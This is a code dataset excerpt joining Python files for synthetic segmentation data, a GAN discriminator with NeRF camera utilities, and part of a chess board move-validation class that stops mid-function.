fig, (inp, tgt) = plt.subplots(2)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_rects - 1):
patch = rectangle(
**random_rect_args(*args))
inp.add_patch(patch)
rect_args = random_rect_args(*args, scale=0.5)
inp_rect_args = {**rect_args, **{"c": class_color}}
tgt_rect_args = {**rect_args, **{"c": "white"}}
inp.add_patch(rectangle(**inp_rect_args))
tgt.add_patch(rectangle(**tgt_rect_args))
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_rectangles_samples(
height=108,
width=108,
num_samples=10_000,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "train"
),
seed=0
)
generate_rectangles_samples(
height=108,
width=108,
num_samples=2_000,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "test"
),
seed=10_000
)
generate_rectangles_samples(
height=108,
width=108,
num_samples=200,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "eval"
),
seed=12_000
)
"""
shapes_mapping = {
"square": {
"args": random_square_args,
"func": square
},
"polygon": {
"args": random_polygon_args,
"func": polygon
},
"circle": {
"args": random_circle_args,
"func": circle
},
"wedge": {
"args": random_wedge_args,
"func": wedge
}
}
def generate_shapes_samples(
height: int,
width: int,
num_samples: int,
num_shapes: int = 20,
class_shape: str = "square",
directory: str = ".",
file_prefix: str = "shapes",
file_type: str = "png",
seed: int = None
) -> None:
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
other_shapes = list(shapes_mapping.keys())
other_shapes.remove(class_shape)
for i in range(num_samples):
fig, (_, inp, tgt) = plt.subplots(3)
_.imshow(inp_background)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_shapes - 1):
shape = np.random.choice(other_shapes)
args = shapes_mapping[shape]["args"]
func = shapes_mapping[shape]["func"]
args = args(width, height)
shape = func(**args)
inp.add_patch(shape)
args = shapes_mapping[class_shape]["args"]
func = shapes_mapping[class_shape]["func"]
args = args(width, height)
inp_args = {**args, "a": inside(args["a"], .6, 1.)}
tgt_args = {**args, "c": "white", "a": None}
inp.add_patch(func(**inp_args))
tgt.add_patch(func(**tgt_args))
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_shapes_samples(
height=108,
width=108,
num_samples=10_000,
directory="medicus\data\simulated\.shapes\train",
seed=0
)
generate_shapes_samples(
height=108,
width=108,
num_samples=2_000,
directory="medicus\data\simulated\.shapes\test",
seed=10_000
)
generate_shapes_samples(
height=108,
width=108,
num_samples=200,
directory="medicus\data\simulated\.shapes\eval",
seed=12_000
)
"""
def generate_snowflakes_samples(
height: int,
width: int,
num_samples: int = 20,
num_snowflakes: int = 5,
class_color: str = "red",
directory: str = ".",
file_prefix: str = "snowflakes",
file_type: str = "png",
seed: Optional[int] = None
) -> None:
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
fig, (inp, tgt) = plt.subplots(2)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_snowflakes - 1):
shape = snowflake(width, height)
color = random_color(class_color)
patch = patches.Polygon(
xy=shape,
closed=True,
color=color)
inp.add_patch(patch)
shape = snowflake(width, height)
args = dict(xy=shape, closed=True)
inp_patch = patches.Polygon(**args, color=class_color)
tgt_patch = patches.Polygon(**args, color="white")
inp.add_patch(inp_patch)
tgt.add_patch(tgt_patch)
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_snowflakes_samples(
height=108,
width=108,
num_samples=10_000,
directory="medicus\data\simulated\.snowflakes\train",
seed=0
)
generate_snowflakes_samples(
height=108,
width=108,
num_samples=2_000,
directory="medicus\data\simulated\.snowflakes\test",
seed=10_000
)
generate_snowflakes_samples(
height=108,
width=108,
num_samples=200,
directory="medicus\data\simulated\.snowflakes\eval",
seed=12_000
)
"""
def generate_gauss_samples(
dim: int,
num_samples: int = 20,
directory: str = ".",
file_prefix: str = "gauss",
file_type: str = "png",
seed: Optional[int] = None
) -> None:
if seed:
np.random.seed(seed)
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
gauss = random_gauss(dim)
noise = generate_perlin_noise(
height=dim,
width=dim,
octaves=[1., 4., 10.],
scaling=[1., 1, .125])
noise = noise.reshape((dim, dim))
noise = norm(noise) * 0.7
gauss = softmax(gauss)
gauss = norm(gauss)
inp_img = gauss * .7 + noise * .3
tgt_img = gauss > .92
inp_img = inp_img - .05 * (tgt_img < .5)
inp_img *= 255
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
Image.fromarray(inp_img).convert("RGB").save(inp_path)
Image.fromarray(tgt_img).convert("RGB").save(tgt_path)
generate_gauss_samples(
dim=108,
num_samples=10_000,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "train"
),
seed=0)
generate_gauss_samples(
dim=108,
num_samples=2_000,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "test"
),
seed=10_000)
generate_gauss_samples(
dim=108,
num_samples=200,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "eval"
),
seed=12_000)
``` |
{
"source": "1ucky40nc3/mednerf",
"score": 2
} |
#### File: graf/models/discriminator.py
```python
import torch
import torch.nn as nn
from torch.nn.utils import spectral_norm
import torch.nn.functional as F
import random
def conv2d(*args, **kwargs):
return spectral_norm(nn.Conv2d(*args, **kwargs))
def batchNorm2d(*args, **kwargs):
return nn.BatchNorm2d(*args, **kwargs)
class Swish(nn.Module):
def forward(self, feat):
return feat * torch.sigmoid(feat)
class GLU(nn.Module):
def forward(self, x):
nc = x.size(1)
assert nc % 2 == 0, 'channels dont divide 2!'
nc = int(nc/2)
return x[:, :nc] * torch.sigmoid(x[:, nc:])
class DownBlockComp(nn.Module):
def __init__(self, in_planes, out_planes):
super(DownBlockComp, self).__init__()
self.main = nn.Sequential(
conv2d(in_planes, out_planes, 4, 2, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2, inplace=True),
conv2d(out_planes, out_planes, 3, 1, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2)
)
self.direct = nn.Sequential(
nn.AvgPool2d(2, 2),
conv2d(in_planes, out_planes, 1, 1, 0, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2))
def forward(self, feat):
return (self.main(feat) + self.direct(feat)) / 2
class SEBlock(nn.Module):
def __init__(self, ch_in, ch_out):
super().__init__()
self.main = nn.Sequential( nn.AdaptiveAvgPool2d(4),
conv2d(ch_in, ch_out, 4, 1, 0, bias=False), Swish(),
conv2d(ch_out, ch_out, 1, 1, 0, bias=False), nn.Sigmoid() )
def forward(self, feat_small, feat_big):
return feat_big * self.main(feat_small)
class DownBlock(nn.Module):
def __init__(self, in_planes, out_planes):
super(DownBlock, self).__init__()
self.main = nn.Sequential(
conv2d(in_planes, out_planes, 4, 2, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2, inplace=True),
)
def forward(self, feat):
return self.main(feat)
class SimpleDecoder(nn.Module):
"""docstring for CAN_SimpleDecoder"""
def __init__(self, nfc_in=64, nc=3):
super(SimpleDecoder, self).__init__()
nfc_multi = {4:16, 8:8, 16:4, 32:2, 64:2, 128:1, 256:0.5, 512:0.25, 1024:0.125}
nfc = {}
for k, v in nfc_multi.items():
nfc[k] = int(v*32)
def upBlock(in_planes, out_planes):
block = nn.Sequential(
nn.Upsample(scale_factor=2, mode='nearest'),
conv2d(in_planes, out_planes*2, 3, 1, 1, bias=False),
batchNorm2d(out_planes*2), GLU())
return block
self.main = nn.Sequential( nn.AdaptiveAvgPool2d(8),
upBlock(nfc_in, nfc[16]),
upBlock(nfc[16], nfc[32]),
upBlock(nfc[32], nfc[64]),
upBlock(nfc[64], nfc[128]),
conv2d(nfc[128], nc, 3, 1, 1, bias=False),
nn.Tanh() )
def forward(self, input):
# input shape: c x 4 x 4
return self.main(input)
class Discriminator(nn.Module):
def __init__(self, nc=3, ndf=64, imsize=64):
super(Discriminator, self).__init__()
self.nc = nc
assert(imsize==32 or imsize==64 or imsize==128)
self.im_size = imsize
nfc_multi = {4:16, 8:16, 16:8, 32:4, 64:2, 128:1, 256:0.5, 512:0.25, 1024:0.125}
nfc = {}
for k, v in nfc_multi.items():
nfc[k] = int(v*ndf)
self.down_from_big = nn.Sequential(
conv2d(nc, nfc[512], 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True) )
self.down_4 = DownBlockComp(nfc[512], nfc[256])
self.down_8 = DownBlockComp(nfc[256], nfc[128])
sequence = [conv2d(nfc[128] , nfc[32], 1, 1, 0, bias=False),
batchNorm2d(nfc[32]),
nn.LeakyReLU(0.2, inplace=True)]
self.dag_heads = []
for i in range(4):
head = sequence + [conv2d(nfc[32], 1, 4, 1, 0, bias=False)]
self.dag_heads.append(nn.Sequential(*head))
self.dag_heads = nn.ModuleList(self.dag_heads)
self.se_2_16 = SEBlock(nfc[512], nfc[256])
self.se_4_32 = SEBlock(nfc[256], nfc[128])
self.decoder_big = SimpleDecoder(nfc[128], nc)
self.decoder_part = SimpleDecoder(nfc[256], nc)
def forward(self, input, y=None):
feat_2 = self.down_from_big(input)
feat_4 = self.down_4(feat_2)
feat_16 = self.se_2_16(feat_2, feat_4)
feat_8 = self.down_8(feat_16)
feat_last = self.se_4_32(feat_4, feat_8)
dag_outputs = []
for i in range(4):
dag_outputs.append(self.dag_heads[i](feat_last).view(-1))
if y[0] == 1:
rec_img_big = self.decoder_big(feat_last)
part = random.randint(0, 3)
rec_img_part = None
if part==0:
rec_img_part = self.decoder_part(feat_16[:,:,:8,:8])
if part==1:
rec_img_part = self.decoder_part(feat_16[:,:,:8,8:])
if part==2:
rec_img_part = self.decoder_part(feat_16[:,:,8:,:8])
if part==3:
rec_img_part = self.decoder_part(feat_16[:,:,8:,8:])
return dag_outputs, [rec_img_big, rec_img_part], part, input
return dag_outputs
```
#### File: graf-main/graf/utils.py
```python
import numpy as np
import torch
import imageio
import os
import torch.utils.data as data
def InfiniteSampler(n):
"""Data sampler"""
i = n - 1
order = np.random.permutation(n)
while True:
yield order[i]
i += 1
if i >= n:
np.random.seed()
order = np.random.permutation(n)
i = 0
class InfiniteSamplerWrapper(data.sampler.Sampler):
"""Data sampler wrapper"""
def __init__(self, data_source):
self.num_samples = len(data_source)
def __iter__(self):
return iter(InfiniteSampler(self.num_samples))
def __len__(self):
return 2 ** 15
def get_nsamples(data_loader, N):
x = []
n = 0
while n < N:
x_next = next(data_loader)
x_next = x_next.cuda(non_blocking=True)
x.append(x_next)
n += x_next.size(0)
x = torch.cat(x, dim=0)[:N]
return x
def count_trainable_parameters(model):
model_parameters = filter(lambda p: p.requires_grad, model.parameters())
return sum([np.prod(p.size()) for p in model_parameters])
def save_video(imgs, fname, as_gif=False, fps=24, quality=8):
# convert to np.uint8
imgs = (255 * np.clip(imgs.permute(0, 2, 3, 1).detach().cpu().numpy() / 2 + 0.5, 0, 1)).astype(np.uint8)
imageio.mimwrite(fname, imgs, fps=fps, quality=quality)
if as_gif: # save as gif, too
os.system(f'ffmpeg -i {fname} -r 15 '
f'-vf "scale=512:-1,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" {os.path.splitext(fname)[0] + ".gif"}')
def color_depth_map(depths, scale=None):
"""
Color an input depth map.
Arguments:
depths -- HxW numpy array of depths
[scale=None] -- scaling the values (defaults to the maximum depth)
Returns:
colored_depths -- HxWx3 numpy array visualizing the depths
"""
_color_map_depths = np.array([
[0, 0, 0], # 0.000
[0, 0, 255], # 0.114
[255, 0, 0], # 0.299
[255, 0, 255], # 0.413
[0, 255, 0], # 0.587
[0, 255, 255], # 0.701
[255, 255, 0], # 0.886
[255, 255, 255], # 1.000
[255, 255, 255], # 1.000
]).astype(float)
_color_map_bincenters = np.array([
0.0,
0.114,
0.299,
0.413,
0.587,
0.701,
0.886,
1.000,
2.000, # doesn't make a difference, just strictly higher than 1
])
if scale is None:
scale = depths.max()
values = np.clip(depths.flatten() / scale, 0, 1)
# for each value, figure out where they fit in in the bincenters: what is the last bincenter smaller than this value?
lower_bin = ((values.reshape(-1, 1) >= _color_map_bincenters.reshape(1, -1)) * np.arange(0, 9)).max(axis=1)
lower_bin_value = _color_map_bincenters[lower_bin]
higher_bin_value = _color_map_bincenters[lower_bin + 1]
alphas = (values - lower_bin_value) / (higher_bin_value - lower_bin_value)
colors = _color_map_depths[lower_bin] * (1 - alphas).reshape(-1, 1) + _color_map_depths[
lower_bin + 1] * alphas.reshape(-1, 1)
return colors.reshape(depths.shape[0], depths.shape[1], 3).astype(np.uint8)
# Virtual camera utils
def to_sphere(u, v):
theta = 2 * np.pi * u
phi = np.arccos(1 - 2 * v)
cx = np.sin(phi) * np.cos(theta)
cy = np.sin(phi) * np.sin(theta)
cz = np.cos(phi)
s = np.stack([cx, cy, cz])
return s
def polar_to_cartesian(r, theta, phi, deg=True):
if deg:
phi = phi * np.pi / 180
theta = theta * np.pi / 180
cx = np.sin(phi) * np.cos(theta)
cy = np.sin(phi) * np.sin(theta)
cz = np.cos(phi)
return r * np.stack([cx, cy, cz])
def to_uv(loc):
# normalize to unit sphere
loc = loc / loc.norm(dim=1, keepdim=True)
cx, cy, cz = loc.t()
v = (1 - cz) / 2
phi = torch.acos(cz)
sin_phi = torch.sin(phi)
# ensure we do not divide by zero
eps = 1e-8
sin_phi[sin_phi.abs() < eps] = eps
theta = torch.acos(cx / sin_phi)
# check for sign of phi
cx_rec = sin_phi * torch.cos(theta)
if not np.isclose(cx.numpy(), cx_rec.numpy(), atol=1e-5).all():
sin_phi = -sin_phi
# check for sign of theta
cy_rec = sin_phi * torch.sin(theta)
if not np.isclose(cy.numpy(), cy_rec.numpy(), atol=1e-5).all():
theta = -theta
u = theta / (2 * np.pi)
assert np.isclose(to_sphere(u, v).detach().cpu().numpy(), loc.t().detach().cpu().numpy(), atol=1e-5).all()
return u, v
def to_phi(u):
return 360 * u # 2*pi*u*180/pi
def to_theta(v):
return np.arccos(1 - 2 * v) * 180. / np.pi
def sample_on_sphere(range_u=(0, 1), range_v=(0, 1)):
u = np.random.uniform(*range_u)
v = np.random.uniform(*range_v)
return to_sphere(u, v)
def look_at(eye, at=np.array([0, 0, 0]), up=np.array([0, 0, 1]), eps=1e-5):
at = at.astype(float).reshape(1, 3)
up = up.astype(float).reshape(1, 3)
eye = eye.reshape(-1, 3)
up = up.repeat(eye.shape[0] // up.shape[0], axis=0)
eps = np.array([eps]).reshape(1, 1).repeat(up.shape[0], axis=0)
z_axis = eye - at
z_axis /= np.max(np.stack([np.linalg.norm(z_axis, axis=1, keepdims=True), eps]))
x_axis = np.cross(up, z_axis)
x_axis /= np.max(np.stack([np.linalg.norm(x_axis, axis=1, keepdims=True), eps]))
y_axis = np.cross(z_axis, x_axis)
y_axis /= np.max(np.stack([np.linalg.norm(y_axis, axis=1, keepdims=True), eps]))
r_mat = np.concatenate((x_axis.reshape(-1, 3, 1), y_axis.reshape(-1, 3, 1), z_axis.reshape(-1, 3, 1)), axis=2)
return r_mat
``` |
{
"source": "1ucky40nc3/pycheese",
"score": 3
} |
#### File: pycheese/core/board.py
```python
from __future__ import annotations
import copy
from typing import Optional
from pycheese.core.entity import Entity
from pycheese.core.entity import Empty
from pycheese.core.entity import Piece
from pycheese.core.entity import Pawn
from pycheese.core.entity import Knight
from pycheese.core.entity import Bishop
from pycheese.core.entity import Rook
from pycheese.core.entity import Queen
from pycheese.core.entity import King
from pycheese.core.utils import Boundary
from pycheese.core.utils import coord_to_dict
from pycheese.core.utils import dict_to_coord
from pycheese.core.utils import normalize
from pycheese.core.error import NotInPlayersPossesionException
from pycheese.core.error import NoPieceAtSpecifiedCoordinateException
from pycheese.core.error import MoveNotLegalException
from pycheese.core.error import NotWhitelistedException
class Board:
"""Object-oriented representation of a chess board.
Args:
json (dict): A JSON representation of an objects this class produces.
Attributes:
state (str): State of the game (`ongoing`/`check`/`checkmate`/`stalemate`).
player (str): String that identifies the player whose turn it is.
board (`list` of `list` of `Entity`): list representing the board.
"""
def __init__(self, json: Optional[dict] = None):
self.state = "ongoing"
self.player = "white"
self.last = {}
self.board = []
self.init(json)
def set(self, board: list[list[Entity]]) -> None:
self.board = board
def get(self) -> list[list[Entity]]:
return self.board
def init(self, json: Optional[dict]) -> None:
"""Initialize the Board classes board.
Args:
json (dict): A JSON representation of an objects this class produces.
"""
if json:
self.from_dict(json)
else:
self.set(initial_board())
self.update()
def move(self, source_coord: list[int, int],
target_coord: list[int, int],
promotion_target: Optional[str] = None) -> dict:
"""Move the a current player's piece.
Move the a current player's piece that is specified via a coordinate on
the board (`source_coord`) to a target coordinate (`target_coord`).
If the move from source to target is legal, it will be executed.
If a pawn shall be promoted the `promotion_target` parameter must be specified.
This parameter identifies the type of piece that shall be spawned at the
`target_coord` coordinate on the chessboard. The pawn at the `source_coord`
coordinate will be substituted with an entity of type `Empty`.
Args:
source_coord (str or `list` of `int`): Initial coordinate of entity on board.
target_coord (str or `list` of `int`): Target coordinate of entity on board.
promotion_target (str, optional): String that identifies piece to promote pawn into.
Returns:
dict: The boards state.
The output is shaped like:
{
"state": state, # The boards state.
"source_coord": source_coord, # The source coordinate.
"target_coord": target_coord, # The target coordinate.
"event": { # Object with details about an event.
"type": message, # Type of an event.
"extra": extra # Extra data about the event.
}
}
Raises:
ValueError: If the source and target coordinate are equal or out of bounds.
NotInPlayersPossesionException: The source coordinate isn't under the current players posession.
MoveNotLegalException: The move from source to target is not legal.
NoPieceAtSpecifiedCoordinateException: There is no piece at the coordinate.
Example:
>>> board = Board()
>>> board.move([0, 6], [0, 5])
{
"state": "ongoing",
"source_coord": {
"x": 0,
"y": 6,
}
"target_coord": {
"x": 0,
"y": 5,
}
"event": {
"type": None,
"extra": None
}
}
Todo:
# TODO: Implement draw by default.
# TODO: Test behavior.
"""
if target_coord == source_coord:
raise ValueError(
"The target coordinate can't be equal to the source coordinate!")
sx, sy = source_coord
tx, ty = target_coord
boundary = Boundary(0, 8)
if not (boundary.accepts((sx, sy))):
raise ValueError(
"The source coordinate is out of bounds: {}".format(source_coord))
if not (boundary.accepts((tx, ty))):
raise ValueError(
"The target coordinate is out of bounds: {}".format(target_coord))
# Construct JSON for the function output.
event = {"type": None, "extra": None}
source_entity = self.board[sy][sx]
target_entity = self.board[ty][tx]
if not isinstance(source_entity, Piece):
raise NoPieceAtSpecifiedCoordinateException(
"There is no piece at the specified coordinate. {}".format(source_coord))
else:
if source_entity.get_player() != self.player:
raise NotInPlayersPossesionException(
"The piece at source coordinate is not in the current player's possesion!")
source_moves, others = self.get_piece_options(source_entity)
if target_coord not in source_moves:
raise MoveNotLegalException(
"The move from the source coordinate to the target coordinate is not legal!")
else:
if others:
for element in others:
cx, cy = element["companion"]
companion = self.board[cy][cx]
x, y = element["cmove"]
pmove = element["pmove"]
if target_coord == pmove:
# Place ``Empty`` at the companions former coordinate.
self.board[cy][cx] = Empty([cx, cy])
# Place the `companion` at the new coordinate.
companion.set_coord([x, y])
self.board[y][x] = companion
# Place the `source_entity` at the new coordinate.
source_entity.set_coord([tx, ty])
self.board[ty][tx] = source_entity
# Place ``Empty`` at the king former coordinate.
self.board[sy][sx] = Empty([sx, sy])
side = "queenside" if tx < 4 else "kingside"
event = {"type": "castle", "extra": side}
break
else:
if isinstance(source_entity, Pawn) and (ty == 0 or ty == 7) and isinstance(target_entity, Empty):
# Request promotion target if is None.
if promotion_target is None:
event = {"type": "missing_promotion_target", "extra": None}
self.board[ty][tx] = str_to_piece(
promotion_target, target_coord, self.player, whitelist={"Queen", "Rook", "Bishop", "Knight"})
event = {"type": "promotion", "extra": promotion_target}
else:
if isinstance(self.board[ty][tx], Piece):
event["type"] = "captures"
else:
event["type"] = "move"
is_unique, overlapp = self.is_unique_move(target_coord, source_entity)
if is_unique:
event["extra"] = "unique"
else:
event["extra"] = "".join(filter(None, ["multiple", overlapp]))
source_entity.set_coord(target_coord)
self.board[ty][tx] = source_entity
if (isinstance(source_entity, (Rook, King))):
# TODO: Check if works!
source_entity.did_move()
self.board[sy][sx] = Empty([sx, sy])
# Set up for next turn.
self.last = coord_to_dict(target_coord)
self.next_turn()
return {
"state": self.state,
"source_coord": coord_to_dict(source_coord),
"target_coord": coord_to_dict(target_coord),
"event": event
}
def inspect(self, coord: list[int, int]) -> dict:
"""Inspect a piece's moves.
Get the moves of a current player's piece
that is identified via it's coordinate on the board.
Args:
coord (`list` of `int`): Coordinate on the chess board.
Returns:
`dict`: Dictionary that represents data about a pieces moves.
Raises:
ValueError: If the source and target coordinate are equal or out of bounds.
NotInPlayersPossesionException: The source coordinate isn't under the current players posession.
NoPieceAtSpecifiedCoordinateException: There is no piece at the coordinate.
Example:
>>> board = Board()
>>> board.inspect([0, 6])
{
"coord": {
"x": 0,
"y": 6
},
"piece": {
"type": "Pawn",
"player": "white",
"coord": {
"x": 0,
"y": 6
},
"pinned": False,
"attacker": None
},
"moves": [
{
"x": 0,
"y": 5
},
{
"x": 0,
"y": 4
},
]
}
"""
x, y = coord
# Check if the coordinate is on the chess board.
boundary = Boundary(0, 8)
if not (boundary.accepts((x, y))):
raise ValueError(f"The piece coordinate is out of bounds: {coord}")
entity = self.board[y][x]
if isinstance(entity, Piece):
if entity.get_player() != self.player:
raise NotInPlayersPossesionException(
"The piece at source coordinate is not in the current player's possesion!")
piece_moves, _ = self.get_piece_options(entity, find_others=False)
return {
"coord": coord_to_dict(coord),
"piece": entity.to_dict(entity),
"moves": coord_to_dict(piece_moves, as_list=True)
}
raise NoPieceAtSpecifiedCoordinateException(
"There is no piece at the specified coordinate. {}".format(coord))
def get_piece_options(self, piece: Piece, board: list[list[Entity]] = None,
find_others: bool = True, attacking: bool = False) -> list[list[int, int]]:
"""Find a pieces legal moves.
Args:
piece (`Piece`): A piece of the current player.
find_other (`bool`, optional): States if information about companion moves shall be returned.
attacking (`bool`, optional): States if only moves that attack enemy pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
Returns:
`list`: piece_moves and companion moves
* piece_moves (`list` of `list` of int):
list of coordinates that can be legally accessed by the piece.
* others (`list` of `dict`):
list of dicts of data associated with other legal moves (e.g. for castling).
The dict inside the list are of shape:
{
"companion": `Piece`,
"others": `list` of `list` of `int`
"piece_moves": `list` of `list` of `int`
}
Example:
>>> board = Board() # Initialize a new board.
>>> piece = board.get()[6][0] # Moves of white pawn on a1.
>>> board.get_piece_options(piece) # Get the pieces options.
([[0, 5], [0, 4]], [])
"""
moves = []
others = []
px, py = piece.get_coord()
# If no `board` is specified select the position (`self.board`).
if board is None:
board = self.board
# Return the piece's options if they are already known.
if piece.get_options():
options = piece.get_options()
return options["moves"], options["others"]
boundary = Boundary(0, 8)
for dx, dy in piece.get_moves():
# Invert the movement for white `pieces`,
# because of the way the board has ben initialized.
if piece.get_player() == "white":
dy *= -1
x, y = px, py
loop = True
# Traverse the path given by the movement of the `piece` types
# from the `piece` coordinate and recoord the coordinates
# until another `piece` was found or the coordinate is out of bounds.
# These recoorded coordinates are regarded as the legal moves.
while loop and boundary.accepts((x + dx, y + dy)):
x += dx
y += dy
entity = board[y][x]
if isinstance(entity, Piece):
if attacking:
loop = False
else:
if self.is_other_player_piece(entity, piece):
loop = False
else:
break
# Check if the `piece` could check the enemy king
# if a enemy `piece` would move. Set this `piece` to `pinned`.
if not self.is_check() and isinstance(piece, (Bishop, Rook, Queen)):
tmp_x, tmp_y = x, y
while boundary.accepts((tmp_x + dx, tmp_y + dy)):
tmp_x += dx
tmp_y += dy
tmp_entity = board[tmp_y][tmp_x]
if isinstance(tmp_entity, Piece):
if self.is_other_player_king(tmp_entity, piece):
sx, sy = entity.get_coord()
self.board[sy][sx].set_pinned(True)
self.board[sy][sx].set_pinner(piece.get_coord())
break
moves.append([x, y])
# End the loop for `pieces` of type ``Pawn``, ``Knight`` or ``King``.
if isinstance(piece, (Pawn, Knight, King)):
break
if isinstance(piece, King) and not attacking:
def is_attacked(move):
x, y = move
return not board[y][x].is_attacked()
moves = list(filter(is_attacked, moves))
# Check if the `piece` is of type ``Pawn``
# and can execute it's unique movement.
if isinstance(piece, Pawn):
amoves = []
for move in piece.get_attack_moves():
dx, dy = move
# Invert the movement for white `pieces`,
# because of the way the board has ben initialized.
if piece.get_player() == "white":
dy *= -1
x, y = px + dx, py + dy
if boundary.accepts((x, y)):
# Check if a `piece` is at the current coordinate.
entity = board[y][x]
# Add the coordinate to `attacking_moves` if
# a ``Piece`` of the enemy is at the coordinate.
if not attacking and isinstance(entity, Piece):
if self.is_other_player_piece(entity, piece):
amoves.append([x, y])
# Add the coordinate to `attacking_moves` regardless
# of the fact that a ``Piece`` is at the coordinate.
# Because all attacking moves are recoorded.
# Check only if a chess piece is in the opponent's possession.
elif attacking:
amoves.append([x, y])
# If only attacking moves shall be recoorded,
# `piece_moves` equal `attacking_moves`.
if attacking:
moves = amoves
# Else append the `attacking_moves` to `piece_moves`
# and check if the ``Pawn`` can execute it's special move.
else:
moves += amoves
if piece.can_special():
dx, dy = piece.get_special_move()
if piece.get_player() == "white":
dy *= -1
x, y = px + dx, py + dy
# Check if all coord in the path to [x, y] are empty.
coords = [[x, y - int(dy/2)], [x, y]]
if all(isinstance(board[j][i], Empty) for i, j in coords):
moves.append([x, y])
# Check if `piece` is `pinned`. If the `piece` is `pinned`
# it can only move in the `attackers` direction.
# To compute the legal moves keep the coordinates
# in the `attackers` `line_of_attack`
# (the attackers moves towards the king).
if piece.is_pinned():
ax, ay = piece.get_pinner()
dx, dy = ax - px, ay - py
dx, dy = normalize(dx), normalize(dy)
start_x, stop_x = sorted([ax, px])
xboundary = Boundary(start_x, stop_x)
start_y, stop_y = sorted([ay, py])
yboundary = Boundary(start_y, stop_y)
x, y = px, py
tmp = []
while xboundary.accepts(x + dx) and yboundary.accepts(y + dy):
x += dx
y += dy
tmp.append([x, y])
moves = list(filter(lambda move: move in tmp, moves))
# If the current player is in check: Find all moves that resolve the check.
if self.is_check() and not attacking:
# If the `piece` is of type ``King`` then only moves
# that lead to non attacked coordinates are valid.
if isinstance(piece, King):
ax, ay = dict_to_coord(self.last)
entity = board[ay][ax]
emoves = []
boundary = Boundary(0, 8)
for dx, dy in entity.get_moves():
x, y = ax, ay
while boundary.accepts((x + dx, y + dy)):
x += dx
y += dy
entity = board[y][x]
if isinstance(entity, Empty) or entity == piece:
emoves.append([x, y])
else:
break
moves = list(filter(lambda move: move not in emoves, moves))
# Else find the king and all moves of the
# `piece` that hide the king from check.
else:
king = self.get_player_king()
# List of all moves to avoid check.
tmp = []
# Set the `state` temporary to "ongoing" to look
# into future positions without restrictions.
self.state = "ongoing"
# To block check the `piece` has to step into
# squares on the board that are being attacked by the enemy.
# Compute theese and check if the king is hidden from check.
other_player_options = self.get_other_player_options(
include_piece_coord=True)
for move in moves:
if move in other_player_options:
tmp_board = copy.deepcopy(board)
tmp_piece = copy.deepcopy(piece)
x, y = move
tmp_piece.set_coord([x, y])
tmp_board[y][x] = tmp_piece
tmp_board[py][px] = Empty([px, py])
if king.get_coord() not in self.get_other_player_options(board=tmp_board, save=False):
tmp.append([x, y])
self.state = "check"
moves = tmp
# Check if the player can castle.
# To so first check if the king has already moved or a given rook
# who is identified by the side the `target_coord` leads to.
# Afterwards check if the enemy is attacking squares that
# are needed for castling or if theese squares are.
if self.can_player_castle(piece, find_others, attacking):
# Check if king has already moved.
if not piece.get_moved():
for step in range(-1, 2, 2):
cx = 0 if step == -1 else 7
companion = board[py][cx]
# Check if the `companion` of type `Rook` has already moved.
if (isinstance(companion, Rook) and not companion.get_moved()):
# Check for obstructed or attacked squares.
path_not_obstructed = True
start, stop = (5, 7) if step == 1 else (1, 4)
for x in range(start, stop):
entity = board[py][x]
if isinstance(entity, Piece) or entity.is_attacked():
path_not_obstructed = False
break
if path_not_obstructed:
mx, my = px + step * 2, py
moves.append([mx, my])
# TODO: Update comments that reference companion as `Piece`.
others.append({
"companion": companion.get_coord(),
"cmove": [mx - step, py],
"pmove": [mx, my],
})
return moves, others
def is_other_player_piece(self, piece: Piece, other: Optional[Piece] = None) -> bool:
"""Return if the piece is owned by the other player.
Args:
piece (`Piece`): The piece to check the player.
other (`Piece`, optional): Optional piece to reference a player.
"""
if other:
return piece.get_player() != other.get_player()
return piece.get_player() != self.player
def is_other_player_king(self, piece: Piece, other: Optional[Piece] = None) -> bool:
"""Return if the piece is a king owned by the other player.
Args:
piece (`Piece`): The piece to check the player.
other (`Piece`, optional): Optional piece to reference a player.
"""
player = other.get_player() if other else self.player
return isinstance(piece, King) and piece.get_player() != player
def is_check(self) -> bool:
"""Return if the board's state is 'check'."""
return self.state == "check"
def is_unique_move(self, coord: list[int, int], piece: Piece) -> tuple[bool, str]:
